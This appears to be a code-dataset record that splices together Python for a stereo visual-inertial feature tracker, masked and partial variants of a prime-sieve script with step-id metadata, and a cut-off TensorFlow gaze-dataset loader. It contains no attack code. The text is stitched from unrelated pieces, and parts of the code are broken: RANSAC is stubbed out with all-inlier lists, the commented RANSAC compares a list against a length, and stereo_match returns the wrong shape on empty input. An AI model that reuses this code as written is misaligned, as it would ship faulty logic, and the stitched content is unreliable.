self.predict_feature_tracking(\r\n prev_cam0_points, cam0_R_p_c, self.cam0_intrinsics)\r\n\r\n curr_cam0_points, track_inliers, _ = cv2.calcOpticalFlowPyrLK(\r\n self.prev_cam0_pyramid, self.curr_cam0_pyramid,\r\n prev_cam0_points.astype(np.float32), \r\n curr_cam0_points.astype(np.float32), \r\n **self.config.lk_params)\r\n \r\n # Mark those tracked points out of the image region as untracked.\r\n for i, point in enumerate(curr_cam0_points):\r\n if not track_inliers[i]:\r\n continue\r\n if (point[0] < 0 or point[0] > img.shape[1]-1 or \r\n point[1] < 0 or point[1] > img.shape[0]-1):\r\n track_inliers[i] = 0\r\n\r\n # Collect the tracked points.\r\n prev_tracked_ids = select(prev_ids, track_inliers)\r\n prev_tracked_lifetime = select(prev_lifetime, track_inliers)\r\n prev_tracked_cam0_points = select(prev_cam0_points, track_inliers)\r\n prev_tracked_cam1_points = select(prev_cam1_points, track_inliers)\r\n curr_tracked_cam0_points = select(curr_cam0_points, track_inliers)\r\n\r\n # Number of features left after tracking.\r\n self.num_features['after_tracking'] = len(curr_tracked_cam0_points)\r\n\r\n # Outlier removal involves three steps, which forms a close\r\n # loop between the previous and current frames of cam0 (left)\r\n # and cam1 (right). Assuming the stereo matching between the\r\n # previous cam0 and cam1 images are correct, the three steps are:\r\n #\r\n # prev frames cam0 ----------> cam1\r\n # | |\r\n # |ransac |ransac\r\n # | stereo match |\r\n # curr frames cam0 ----------> cam1\r\n #\r\n # 1) Stereo matching between current images of cam0 and cam1.\r\n # 2) RANSAC between previous and current images of cam0.\r\n # 3) RANSAC between previous and current images of cam1.\r\n #\r\n # For Step 3, tracking between the images is no longer needed.\r\n # The stereo matching results are directly used in the RANSAC.\r\n\r\n # Step 1: stereo matching.\r\n curr_cam1_points, match_inliers = self.stereo_match(\r\n curr_tracked_cam0_points)\r\n\r\n prev_matched_ids = select(prev_tracked_ids, match_inliers)\r\n prev_matched_lifetime = select(prev_tracked_lifetime, match_inliers)\r\n prev_matched_cam0_points = select(prev_tracked_cam0_points, match_inliers)\r\n prev_matched_cam1_points = select(prev_tracked_cam1_points, match_inliers)\r\n curr_matched_cam0_points = select(curr_tracked_cam0_points, match_inliers)\r\n curr_matched_cam1_points = select(curr_cam1_points, match_inliers)\r\n\r\n # Number of features left after stereo matching.\r\n self.num_features['after_matching'] = len(curr_matched_cam0_points)\r\n\r\n # Step 2 and 3: RANSAC on temporal image pairs of cam0 and cam1.\r\n # cam0_ransac_inliers = self.two_point_ransac(\r\n # prev_matched_cam0_points, curr_matched_cam0_points,\r\n # cam0_R_p_c, self.cam0_intrinsics, \r\n # self.cam0_distortion_model, self.cam0_distortion_coeffs, \r\n # self.config.ransac_threshold, 0.99)\r\n\r\n # cam1_ransac_inliers = self.two_point_ransac(\r\n # prev_matched_cam1_points, curr_matched_cam1_points,\r\n # cam1_R_p_c, self.cam1_intrinsics, \r\n # self.cam1_distortion_model, self.cam1_distortion_coeffs, \r\n # self.config.ransac_threshold, 0.99)\r\n cam0_ransac_inliers = [1] * len(prev_matched_cam0_points)\r\n cam1_ransac_inliers = [1] * len(prev_matched_cam1_points)\r\n\r\n # Number of features after ransac.\r\n after_ransac = 0\r\n for i in range(len(cam0_ransac_inliers)):\r\n if not (cam0_ransac_inliers[i] and cam1_ransac_inliers[i]):\r\n continue \r\n row = int(curr_matched_cam0_points[i][1] / grid_height)\r\n col = int(curr_matched_cam0_points[i][0] / grid_width)\r\n code = row * self.config.grid_col + col\r\n\r\n grid_new_feature = FeatureMetaData()\r\n grid_new_feature.id = prev_matched_ids[i]\r\n grid_new_feature.lifetime = prev_matched_lifetime[i] + 1\r\n grid_new_feature.cam0_point = curr_matched_cam0_points[i]\r\n grid_new_feature.cam1_point = curr_matched_cam1_points[i]\r\n prev_matched_lifetime[i] += 1\r\n\r\n self.curr_features[code].append(grid_new_feature)\r\n after_ransac += 1\r\n self.num_features['after_ransac'] = after_ransac\r\n\r\n # Compute the tracking rate.\r\n # prev_feature_num = sum([len(x) for x in self.prev_features])\r\n # curr_feature_num = sum([len(x) for x in self.curr_features])\r\n \r\n\r\n def add_new_features(self):\r\n \"\"\"\r\n Detect new features on the image to ensure that the features are \r\n uniformly distributed on the image.\r\n \"\"\"\r\n curr_img = self.cam0_curr_img_msg.image\r\n grid_height, grid_width = self.get_grid_size(curr_img)\r\n\r\n # Create a mask to avoid redetecting existing features.\r\n mask = np.ones(curr_img.shape[:2], dtype='uint8')\r\n\r\n for feature in chain.from_iterable(self.curr_features):\r\n x, y = map(int, feature.cam0_point)\r\n mask[y-3:y+4, x-3:x+4] = 0\r\n\r\n # Detect new features.\r\n new_features = self.detector.detect(curr_img, mask=mask)\r\n\r\n # Collect the new detected features based on the grid.\r\n # Select the ones with top response within each grid afterwards.\r\n new_feature_sieve = [[] for _ in range(self.config.grid_num)]\r\n for feature in new_features:\r\n row = int(feature.pt[1] / grid_height)\r\n col = int(feature.pt[0] / grid_width)\r\n code = row * self.config.grid_col + col\r\n new_feature_sieve[code].append(feature)\r\n\r\n new_features = []\r\n for features in new_feature_sieve:\r\n if len(features) > self.config.grid_max_feature_num:\r\n features = sorted(features, key=lambda x:x.response, \r\n reverse=True)[:self.config.grid_max_feature_num]\r\n new_features.append(features)\r\n new_features = list(chain.from_iterable(new_features))\r\n\r\n # Find the stereo matched points for the newly detected features.\r\n cam0_points = [kp.pt for kp in new_features]\r\n cam1_points, inlier_markers = self.stereo_match(cam0_points)\r\n\r\n cam0_inliers, cam1_inliers, response_inliers = [], [], []\r\n for i, inlier in enumerate(inlier_markers):\r\n if not inlier:\r\n continue\r\n cam0_inliers.append(cam0_points[i])\r\n cam1_inliers.append(cam1_points[i])\r\n response_inliers.append(new_features[i].response)\r\n # if len(cam0_inliers) < max(5, len(new_features) * 0.1):\r\n\r\n # Group the features into grids\r\n grid_new_features = [[] for _ in range(self.config.grid_num)]\r\n for i in range(len(cam0_inliers)):\r\n cam0_point = cam0_inliers[i]\r\n cam1_point = cam1_inliers[i]\r\n response = response_inliers[i]\r\n\r\n row = int(cam0_point[1] / grid_height)\r\n col = int(cam0_point[0] / grid_width)\r\n code = row*self.config.grid_col + col\r\n\r\n new_feature = FeatureMetaData()\r\n new_feature.response = response\r\n new_feature.cam0_point = cam0_point\r\n new_feature.cam1_point = cam1_point\r\n grid_new_features[code].append(new_feature)\r\n\r\n # Sort the new features in each grid based on its response.\r\n # And collect new features within each grid with high response.\r\n for i, new_features in enumerate(grid_new_features):\r\n for feature in sorted(new_features, key=lambda x:x.response, \r\n reverse=True)[:self.config.grid_min_feature_num]:\r\n self.curr_features[i].append(feature)\r\n self.curr_features[i][-1].id = self.next_feature_id\r\n self.curr_features[i][-1].lifetime = 1\r\n self.next_feature_id += 1\r\n\r\n def prune_features(self):\r\n \"\"\"\r\n Remove some of the features of a grid in case there are too many \r\n features inside of that grid, which ensures the number of features \r\n within each grid is bounded.\r\n \"\"\"\r\n for i, features in enumerate(self.curr_features):\r\n # Continue if the number of features in this grid does\r\n # not exceed the upper bound.\r\n if len(features) <= self.config.grid_max_feature_num:\r\n continue\r\n self.curr_features[i] = sorted(features, key=lambda x:x.lifetime, \r\n reverse=True)[:self.config.grid_max_feature_num]\r\n\r\n def load_features(self):\r\n\r\n # load features \r\n filename = self.config.result_dir + str(self.image_id) + \".npz\"\r\n self.curr_features = np.load(filename, allow_pickle=True)['arr_0']\r\n self.image_id += 1 \r\n\r\n def save_features(self):\r\n \r\n # save features \r\n filename = self.config.result_dir + str(self.image_id) + \".npz\"\r\n np.savez(filename, self.curr_features)\r\n self.image_id += 1 \r\n\r\n def publish(self):\r\n \"\"\"\r\n Publish the features on the current image including both the \r\n tracked and newly detected ones.\r\n \"\"\"\r\n\r\n curr_ids = []\r\n curr_cam0_points = []\r\n curr_cam1_points = []\r\n for feature in chain.from_iterable(self.curr_features):\r\n curr_ids.append(feature.id)\r\n curr_cam0_points.append(feature.cam0_point)\r\n curr_cam1_points.append(feature.cam1_point)\r\n\r\n curr_cam0_points_undistorted = self.undistort_points(\r\n curr_cam0_points, self.cam0_intrinsics,\r\n self.cam0_distortion_model, self.cam0_distortion_coeffs)\r\n curr_cam1_points_undistorted = self.undistort_points(\r\n curr_cam1_points, self.cam1_intrinsics,\r\n self.cam1_distortion_model, self.cam1_distortion_coeffs)\r\n\r\n features = []\r\n for i in range(len(curr_ids)):\r\n fm = FeatureMeasurement()\r\n fm.id = curr_ids[i]\r\n fm.u0 = curr_cam0_points_undistorted[i][0]\r\n fm.v0 = curr_cam0_points_undistorted[i][1]\r\n fm.u1 = curr_cam1_points_undistorted[i][0]\r\n fm.v1 = curr_cam1_points_undistorted[i][1]\r\n features.append(fm)\r\n\r\n feature_msg = namedtuple('feature_msg', ['timestamp', 'features'])(\r\n self.cam0_curr_img_msg.timestamp, features)\r\n return feature_msg\r\n\r\n def integrate_imu_data(self):\r\n \"\"\"\r\n Integrates the IMU gyro readings between the two consecutive images, \r\n which is used for both tracking prediction and 2-point RANSAC.\r\n\r\n Returns:\r\n cam0_R_p_c: a rotation matrix which takes a vector from previous \r\n cam0 frame to current cam0 frame.\r\n cam1_R_p_c: a rotation matrix which takes a vector from previous \r\n cam1 frame to current cam1 frame.\r\n \"\"\"\r\n # Find the start and the end limit within the imu msg buffer.\r\n idx_begin = None\r\n for i, msg in enumerate(self.imu_msg_buffer):\r\n if msg.timestamp >= self.cam0_prev_img_msg.timestamp - 0.01:\r\n idx_begin = i\r\n break\r\n\r\n idx_end = None\r\n for i, msg in enumerate(self.imu_msg_buffer):\r\n if msg.timestamp >= self.cam0_curr_img_msg.timestamp - 0.004:\r\n idx_end = i\r\n break\r\n\r\n if idx_begin is None or idx_end is None:\r\n return np.identity(3), np.identity(3)\r\n\r\n # Compute the mean angular velocity in the IMU frame.\r\n mean_ang_vel = np.zeros(3)\r\n for i in range(idx_begin, idx_end):\r\n mean_ang_vel += self.imu_msg_buffer[i].angular_velocity\r\n\r\n if idx_end > idx_begin:\r\n mean_ang_vel /= (idx_end - idx_begin)\r\n\r\n # Transform the mean angular velocity from the IMU frame to the \r\n # cam0 and cam1 frames.\r\n cam0_mean_ang_vel = self.R_cam0_imu.T @ mean_ang_vel\r\n cam1_mean_ang_vel = self.R_cam1_imu.T @ mean_ang_vel\r\n\r\n # Compute the relative rotation.\r\n dt = self.cam0_curr_img_msg.timestamp - self.cam0_prev_img_msg.timestamp\r\n cam0_R_p_c = cv2.Rodrigues(cam0_mean_ang_vel * dt)[0].T\r\n cam1_R_p_c = cv2.Rodrigues(cam1_mean_ang_vel * dt)[0].T\r\n\r\n # Delete the useless and used imu messages.\r\n self.imu_msg_buffer = self.imu_msg_buffer[idx_end:]\r\n return cam0_R_p_c, cam1_R_p_c\r\n\r\n def rescale_points(self, pts1, pts2):\r\n \"\"\"\r\n Arguments:\r\n pts1: first set of points.\r\n pts2: second set of points.\r\n\r\n Returns:\r\n pts1: scaled first set of points.\r\n pts2: scaled second set of points.\r\n scaling_factor: scaling factor\r\n \"\"\"\r\n scaling_factor = 0\r\n for pt1, pt2 in zip(pts1, pts2):\r\n scaling_factor += np.linalg.norm(pt1)\r\n scaling_factor += np.linalg.norm(pt2)\r\n\r\n scaling_factor = (len(pts1) + len(pts2)) / scaling_factor * np.sqrt(2)\r\n\r\n for i in range(len(pts1)):\r\n pts1[i] *= scaling_factor\r\n pts2[i] *= scaling_factor\r\n\r\n return pts1, pts2, scaling_factor\r\n\r\n # def two_point_ransac(self, pts1, pts2, R_p_c, intrinsics, \r\n # distortion_model, distortion_coeffs,\r\n # inlier_error, success_probability):\r\n # \"\"\"\r\n # Applies two point ransac algorithm to mark the inliers in the input set.\r\n\r\n # Arguments:\r\n # pts1: first set of points.\r\n # pts2: second set of points.\r\n # R_p_c: a rotation matrix takes a vector in the previous camera frame \r\n # to the current camera frame.\r\n # intrinsics: intrinsics of the camera.\r\n # distortion_model: distortion model of the camera.\r\n # distortion_coeffs: distortion coefficients.\r\n # inlier_error: acceptable error to be considered as an inlier.\r\n # success_probability: the required probability of success.\r\n\r\n # Returns:\r\n # inlier_flag: 1 for inliers and 0 for outliers.\r\n # \"\"\"\r\n # # Check the size of input point size.\r\n # assert len(pts1) == len(pts2), 'Sets of different size are used...'\r\n\r\n # norm_pixel_unit = 2.0 / (intrinsics[0] + intrinsics[1])\r\n # iter_num = int(np.ceil(np.log(1-success_probability) / np.log(1-0.7*0.7)))\r\n\r\n # # Initially, mark all points as inliers.\r\n # inlier_markers = [1] * len(pts1)\r\n\r\n # # Undistort all the points.\r\n # pts1_undistorted = self.undistort_points(pts1, intrinsics, \r\n # distortion_model, distortion_coeffs)\r\n # pts2_undistorted = self.undistort_points(pts2, intrinsics, \r\n # distortion_model, distortion_coeffs)\r\n\r\n # # Compenstate the points in the previous image with\r\n # # the relative rotation.\r\n # for i, pt in enumerate(pts1_undistorted):\r\n # pt_h = np.array([*pt, 1.0])\r\n # pt_hc = R_p_c @ pt_h\r\n # pts1_undistorted[i] = pt_hc[:2]\r\n\r\n # # Normalize the points to gain numerical stability.\r\n # pts1_undistorted, pts2_undistorted, scaling_factor = self.rescale_points(\r\n # pts1_undistorted, pts2_undistorted)\r\n\r\n # # Compute the difference between previous and current points,\r\n # # which will be used frequently later.\r\n # pts_diff = []\r\n # for pt1, pt2 in zip(pts1_undistorted, pts2_undistorted):\r\n # pts_diff.append(pt1 - pt2)\r\n\r\n # # Mark the point pairs with large difference directly.\r\n # # BTW, the mean distance of the rest of the point pairs are computed.\r\n # mean_pt_distance = 0.0\r\n # raw_inlier_count = 0\r\n # for i, pt_diff in enumerate(pts_diff):\r\n # distance = np.linalg.norm(pt_diff)\r\n # # 25 pixel distance is a pretty large tolerance for normal motion.\r\n # # However, to be used with aggressive motion, this tolerance should\r\n # # be increased significantly to match the usage.\r\n # if distance > 50.0 * norm_pixel_unit:\r\n # inlier_markers[i] = 0\r\n # else:\r\n # mean_pt_distance += distance\r\n # raw_inlier_count += 1\r\n\r\n # mean_pt_distance /= raw_inlier_count\r\n\r\n # # If the current number of inliers is less than 3, just mark\r\n # # all input as outliers. This case can happen with fast\r\n # # rotation where very few features are tracked.\r\n # if raw_inlier_count < 3:\r\n # return [0] * len(inlier_markers)\r\n\r\n # # Before doing 2-point RANSAC, we have to check if the motion\r\n # # is degenerated, meaning that there is no translation between\r\n # # the frames, in which case, the model of the RANSAC does not work. \r\n # # If so, the distance between the matched points will be almost 0.\r\n # if mean_pt_distance < norm_pixel_unit:\r\n # for i, pt_diff in enumerate(pts_diff):\r\n # if inlier_markers[i] == 0:\r\n # continue\r\n # if np.linalg.norm(pt_diff) > inlier_error * norm_pixel_unit:\r\n # inlier_markers[i] = 0\r\n # return inlier_markers\r\n\r\n # # In the case of general motion, the RANSAC model can be applied.\r\n # # The three column corresponds to tx, ty, and tz respectively.\r\n # coeff_t = []\r\n # for i, pt_diff in enumerate(pts_diff):\r\n # coeff_t.append(np.array([\r\n # pt_diff[1],\r\n # -pt_diff[0],\r\n # pts1_undistorted[0] * pts2_undistorted[1] - \r\n # pts1_undistorted[1] * pts2_undistorted[0]]))\r\n # coeff_t = np.array(coeff_t)\r\n\r\n # raw_inlier_idx = np.where(inlier_markers)[0]\r\n # best_inlier_set = []\r\n # best_error = 1e10\r\n\r\n # for i in range(iter_num):\r\n # # Randomly select two point pairs.\r\n # # Although this is a weird way of selecting two pairs, but it\r\n # # is able to efficiently avoid selecting repetitive pairs.\r\n # pair_idx1 = np.random.choice(raw_inlier_idx)\r\n # idx_diff = np.random.randint(1, len(raw_inlier_idx))\r\n # pair_idx2 = (pair_idx1+idx_diff) % len(raw_inlier_idx)\r\n\r\n # # Construct the model.\r\n # coeff_t_ = np.array([coeff_t[pair_idx1], coeff_t[pair_idx2]])\r\n # coeff_tx = coeff_t_[:, 0]\r\n # coeff_ty = coeff_t_[:, 1]\r\n # coeff_tz = coeff_t_[:, 2]\r\n # coeff_l1_norm = np.linalg.norm(coeff_t_, 1, axis=0)\r\n # base_indicator = np.argmin(coeff_l1_norm)\r\n\r\n # if base_indicator == 0:\r\n # A = np.array([coeff_ty, coeff_tz]).T\r\n # solution = np.linalg.inv(A) @ (-coeff_tx)\r\n # model = [1.0, *solution]\r\n # elif base_indicator == 1:\r\n # A = np.array([coeff_tx, coeff_tz]).T\r\n # solution = np.linalg.inv(A) @ (-coeff_ty)\r\n # model = [solution[0], 1.0, solution[1]]\r\n # else:\r\n # A = np.array([coeff_tx, coeff_ty]).T\r\n # solution = np.linalg.inv(A) @ (-coeff_tz)\r\n # model = [*solution, 1.0]\r\n\r\n # # Find all the inliers among point pairs.\r\n # error = coeff_t @ model\r\n\r\n # inlier_set = []\r\n # for i, e in enumerate(error):\r\n # if inlier_markers[i] == 0:\r\n # continue\r\n # if np.abs(e) < inlier_error * norm_pixel_unit:\r\n # inlier_set.append(i)\r\n\r\n # # If the number of inliers is small, the current model is \r\n # # probably wrong.\r\n # if len(inlier_set) < 0.2 * len(pts1_undistorted):\r\n # continue\r\n\r\n # # Refit the model using all of the possible inliers.\r\n # coeff_t_ = coeff_t[inlier_set]\r\n # coeff_tx_better = coeff_t_[:, 0]\r\n # coeff_ty_better = coeff_t_[:, 1]\r\n # coeff_tz_better = coeff_t_[:, 2]\r\n\r\n # if base_indicator == 0:\r\n # A = np.array([coeff_ty_better, coeff_tz_better]).T\r\n # solution = np.linalg.inv(A.T @ A) @ A.T @ (-coeff_tx_better)\r\n # model_better = [1.0, *solution]\r\n # elif base_indicator == 1:\r\n # A = np.array([coeff_tx_better, coeff_tz_better]).T\r\n # solution = np.linalg.inv(A.T @ A) @ A.T @ (-coeff_ty_better)\r\n # model_better = [solution[0], 1.0, solution[1]]\r\n # else:\r\n # A = np.array([coeff_tx_better, coeff_ty_better]).T\r\n # solution = np.linalg.inv(A.T @ A) @ A.T @ (-coeff_tz_better)\r\n # model_better = [*solution, 1.0]\r\n\r\n # # Compute the error and upate the best model if possible.\r\n # new_error = coeff_t @ model_better\r\n # this_error = np.mean([np.abs(new_error[i]) for i in inlier_set])\r\n\r\n # if len(inlier_set) > best_inlier_set:\r\n # best_error = this_error\r\n # best_inlier_set = inlier_set\r\n\r\n # # Fill in the markers.\r\n # inlier_markers = [0] * len(pts1)\r\n # for i in best_inlier_set:\r\n # inlier_markers[i] = 1\r\n\r\n # return inlier_markers\r\n\r\n def get_grid_size(self, img):\r\n \"\"\"\r\n # Size of each grid.\r\n \"\"\"\r\n grid_height = int(np.ceil(img.shape[0] / self.config.grid_row))\r\n grid_width = int(np.ceil(img.shape[1] / self.config.grid_col))\r\n return grid_height, grid_width\r\n\r\n def predict_feature_tracking(self, input_pts, R_p_c, intrinsics):\r\n \"\"\"\r\n predictFeatureTracking Compensates the rotation between consecutive \r\n camera frames so that feature tracking would be more robust and fast.\r\n\r\n Arguments:\r\n input_pts: features in the previous image to be tracked.\r\n R_p_c: a rotation matrix takes a vector in the previous camera \r\n frame to the current camera frame. (matrix33)\r\n intrinsics: intrinsic matrix of the camera. (vec3)\r\n\r\n Returns:\r\n compensated_pts: predicted locations of the features in the \r\n current image based on the provided rotation.\r\n \"\"\"\r\n # Return directly if there are no input features.\r\n if len(input_pts) == 0:\r\n return []\r\n\r\n # Intrinsic matrix.\r\n K = np.array([\r\n [intrinsics[0], 0.0, intrinsics[2]],\r\n [0.0, intrinsics[1], intrinsics[3]],\r\n [0.0, 0.0, 1.0]])\r\n H = K @ R_p_c @ np.linalg.inv(K)\r\n\r\n compensated_pts = []\r\n for i in range(len(input_pts)):\r\n p1 = np.array([*input_pts[i], 1.0])\r\n p2 = H @ p1\r\n compensated_pts.append(p2[:2] / p2[2])\r\n return np.array(compensated_pts, dtype=np.float32)\r\n\r\n def stereo_match(self, cam0_points):\r\n \"\"\"\r\n Matches features with stereo image pairs.\r\n\r\n Arguments:\r\n cam0_points: points in the primary image.\r\n\r\n Returns:\r\n cam1_points: points in the secondary image.\r\n inlier_markers: 1 if the match is valid, 0 otherwise.\r\n \"\"\"\r\n cam0_points = np.array(cam0_points)\r\n if len(cam0_points) == 0:\r\n return []\r\n\r\n R_cam0_cam1 = self.R_cam1_imu.T @ self.R_cam0_imu\r\n cam0_points_undistorted = self.undistort_points(\r\n cam0_points, self.cam0_intrinsics,\r\n self.cam0_distortion_model, self.cam0_distortion_coeffs, R_cam0_cam1)\r\n cam1_points = self.distort_points(\r\n cam0_points_undistorted, self.cam1_intrinsics,\r\n self.cam1_distortion_model, self.cam1_distortion_coeffs)\r\n cam1_points_copy = cam1_points.copy()\r\n\r\n # Track features using LK optical flow method.\r\n cam0_points = cam0_points.astype(np.float32)\r\n cam1_points = cam1_points.astype(np.float32)\r\n cam1_points, inlier_markers, _ = cv2.calcOpticalFlowPyrLK(\r\n self.curr_cam0_pyramid, self.curr_cam1_pyramid,\r\n cam0_points, cam1_points, **self.config.lk_params)\r\n\r\n cam0_points_, _, _ = cv2.calcOpticalFlowPyrLK(\r\n self.curr_cam1_pyramid, self.curr_cam0_pyramid, \r\n cam1_points, cam0_points.copy(), **self.config.lk_params)\r\n err = np.linalg.norm(cam0_points - cam0_points_, axis=1)\r\n\r\n # cam1_points_undistorted = self.undistort_points(\r\n # cam1_points, self.cam1_intrinsics,\r\n # self.cam1_distortion_model, self.cam1_distortion_coeffs, R_cam0_cam1)\r\n disparity = np.abs(cam1_points_copy[:, 1] - cam1_points[:, 1])\r\n \r\n\r\n \r\n inlier_markers = np.logical_and.reduce(\r\n [inlier_markers.reshape(-1), err < 3, disparity < 20])\r\n\r\n # Mark those tracked points out of the image region as untracked.\r\n img = self.cam1_curr_img_msg.image\r\n for i, point in enumerate(cam1_points):\r\n if not inlier_markers[i]:\r\n continue\r\n if (point[0] < 0 or point[0] > img.shape[1]-1 or \r\n point[1] < 0 or point[1] > img.shape[0]-1):\r\n inlier_markers[i] = 0\r\n\r\n # Compute the relative rotation between the cam0 frame and cam1 frame.\r\n t_cam0_cam1 = self.R_cam1_imu.T @ (self.t_cam0_imu - self.t_cam1_imu)\r\n # Compute the essential matrix.\r\n E = skew(t_cam0_cam1) @ R_cam0_cam1\r\n\r\n # Further remove outliers based on the known essential matrix.\r\n cam0_points_undistorted = self.undistort_points(\r\n cam0_points, self.cam0_intrinsics,\r\n self.cam0_distortion_model, self.cam0_distortion_coeffs)\r\n cam1_points_undistorted = self.undistort_points(\r\n cam1_points, self.cam1_intrinsics,\r\n self.cam1_distortion_model, self.cam1_distortion_coeffs)\r\n\r\n norm_pixel_unit = 4.0 / (\r\n self.cam0_intrinsics[0] + self.cam0_intrinsics[1] +\r\n self.cam1_intrinsics[0] + self.cam1_intrinsics[1])\r\n\r\n for i in range(len(cam0_points_undistorted)):\r\n if not inlier_markers[i]:\r\n continue\r\n pt0 = np.array([*cam0_points_undistorted[i], 1.0])\r\n pt1 = np.array([*cam1_points_undistorted[i], 1.0])\r\n epipolar_line = E @ pt0\r\n error = np.abs((pt1 * epipolar_line)[0]) / np.linalg.norm(\r\n epipolar_line[:2])\r\n\r\n if error > self.config.stereo_threshold * norm_pixel_unit:\r\n inlier_markers[i] = 0\r\n\r\n return cam1_points, inlier_markers\r\n\r\n def undistort_points(self, pts_in, intrinsics, distortion_model, \r\n distortion_coeffs, rectification_matrix=np.identity(3),\r\n new_intrinsics=np.array([1, 1, 0, 0])):\r\n \"\"\"\r\n Arguments:\r\n pts_in: points to be undistorted.\r\n intrinsics: intrinsics of the camera.\r\n distortion_model: distortion model of the camera.\r\n distortion_coeffs: distortion coefficients.\r\n rectification_matrix:\r\n new_intrinsics:\r\n\r\n Returns:\r\n pts_out: undistorted points.\r\n \"\"\"\r\n if len(pts_in) == 0:\r\n return []\r\n \r\n pts_in = np.reshape(pts_in, (-1, 1, 2))\r\n K = np.array([\r\n [intrinsics[0], 0.0, intrinsics[2]],\r\n [0.0, intrinsics[1], intrinsics[3]],\r\n [0.0, 0.0, 1.0]])\r\n K_new = np.array([\r\n [new_intrinsics[0], 0.0, new_intrinsics[2]],\r\n [0.0, new_intrinsics[1], new_intrinsics[3]],\r\n [0.0, 0.0, 1.0]])\r\n\r\n if distortion_model == 'equidistant':\r\n pts_out = cv2.fisheye.undistortPoints(pts_in, K, distortion_coeffs,\r\n rectification_matrix, K_new)\r\n else: # default: 'radtan'\r\n pts_out = cv2.undistortPoints(pts_in, K, distortion_coeffs, None,\r\n rectification_matrix, K_new)\r\n return pts_out.reshape((-1, 2))\r\n\r\n def distort_points(self, pts_in, intrinsics, distortion_model, \r\n distortion_coeffs):\r\n \"\"\"\r\n Arguments:\r\n pts_in: points to be distorted.\r\n intrinsics: intrinsics of the camera.\r\n distortion_model: distortion model of the camera.\r\n distortion_coeffs: distortion coefficients.\r\n\r\n Returns:\r\n pts_out: distorted points. (N, 2)\r\n \"\"\"\r\n if len(pts_in) == 0:\r\n return []\r\n\r\n K = np.array([\r\n [intrinsics[0], 0.0, intrinsics[2]],\r\n [0.0, intrinsics[1], intrinsics[3]],\r\n [0.0, 0.0, 1.0]])\r\n\r\n if distortion_model == 'equidistant':\r\n pts_out = cv2.fisheye.distortPoints(pts_in, K, distortion_coeffs)\r\n else: # default: 'radtan'\r\n homogenous_pts = cv2.convertPointsToHomogeneous(pts_in)\r\n pts_out, _ = cv2.projectPoints(homogenous_pts, \r\n np.zeros(3), np.zeros(3), K, distortion_coeffs)\r\n return pts_out.reshape((-1, 2))\r\n\r\n def draw_features_stereo(self):\r\n img0 = self.cam0_curr_img_msg.image\r\n img1 = self.cam1_curr_img_msg.image\r\n\r\n kps0 = []\r\n kps1 = []\r\n matches = []\r\n for feature in chain.from_iterable(self.curr_features):\r\n matches.append(cv2.DMatch(len(kps0), len(kps0), 0))\r\n kps0.append(cv2.KeyPoint(*feature.cam0_point, 1))\r\n kps1.append(cv2.KeyPoint(*feature.cam1_point, 1))\r\n\r\n img = cv2.drawMatches(img0, kps0, img1, kps1, matches, None, flags=2)\r\n cv2.imshow('stereo features', img)\r\n cv2.waitKey(1)\r\n\r\n\r\ndef skew(vec):\r\n x, y, z = vec\r\n return np.array([\r\n [0, -z, y],\r\n [z, 0, -x],\r\n [-y, x, 0]])\r\n\r\ndef select(data, selectors):\r\n return [d for d, s in zip(data, selectors) if s]\r\n\r\n\r\n",
"step-ids": [
18,
20,
23,
25,
31
]
}
|
[
18,
20,
23,
25,
31
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for i in range(2, N + 1):
prime -= set(range(i ** 2, N + 1, i))
for number in prime:
print(number)
<|reserved_special_token_1|>
M, N = 3, 16
prime = set(range(M, N + 1))
for i in range(2, N + 1):
prime -= set(range(i ** 2, N + 1, i))
for number in prime:
print(number)
|
flexible
|
{
"blob_id": "d190eb27ea146cf99ac7f8d29fb5f769121af60e",
"index": 9437,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(2, N + 1):\n prime -= set(range(i ** 2, N + 1, i))\nfor number in prime:\n print(number)\n",
"step-3": "M, N = 3, 16\nprime = set(range(M, N + 1))\nfor i in range(2, N + 1):\n prime -= set(range(i ** 2, N + 1, i))\nfor number in prime:\n print(number)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class Dataset:
def __init__(self, config, path, batch_size, shuffle, is_training,
is_testing):
self.config = config
self.is_training = is_training
self.is_testing = is_testing
self.path = path
"""
each archive contains:
face - a list 224x224 BGR images of type uint8
eye-region - a list 224x60 BGR images of type uint8
left-eye - a list 90x60 BGR images of type uint8
right-eye - a list 90x60 BGR images of type uint8
head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.
face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.
gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.
"""
hdf5 = h5py.File(self.path, 'r')
keys = list(hdf5.keys())
self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/left-eye', spec=tf.uint8)
self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +
'/head', spec=tf.float64)
if is_training or is_testing:
self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/gaze', spec=tf.float64)
if is_testing or is_training:
self.data = tf.data.Dataset.zip((self.left_eye, self.head, self
.gaze))
else:
self.data = tf.data.Dataset.zip((self.left_eye, self.head))
self.batch_size = batch_size
self.shuffle = shuffle
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class GeneratorVGGNet:
<|reserved_special_token_0|>
class Dataset:
def __init__(self, config, path, batch_size, shuffle, is_training,
is_testing):
self.config = config
self.is_training = is_training
self.is_testing = is_testing
self.path = path
"""
each archive contains:
face - a list 224x224 BGR images of type uint8
eye-region - a list 224x60 BGR images of type uint8
left-eye - a list 90x60 BGR images of type uint8
right-eye - a list 90x60 BGR images of type uint8
head - a list of 1x2 arrays. Each row contains the Euler angle representations of head orientation given in radians.
face-landmarks - a list of 33x2 arrays. Each row contains the (u,v) coordinates of selected facial landmarks as found in the provided face image patches.
gaze (except in test set) - a list of 1x2 arrays. Each row contains the Euler angle representations of gaze direction given in radians.
"""
hdf5 = h5py.File(self.path, 'r')
keys = list(hdf5.keys())
self.left_eye = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/left-eye', spec=tf.uint8)
self.head = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[0]) +
'/head', spec=tf.float64)
if is_training or is_testing:
self.gaze = tfio.IODataset.from_hdf5(self.path, '/' + str(keys[
0]) + '/gaze', spec=tf.float64)
if is_testing or is_training:
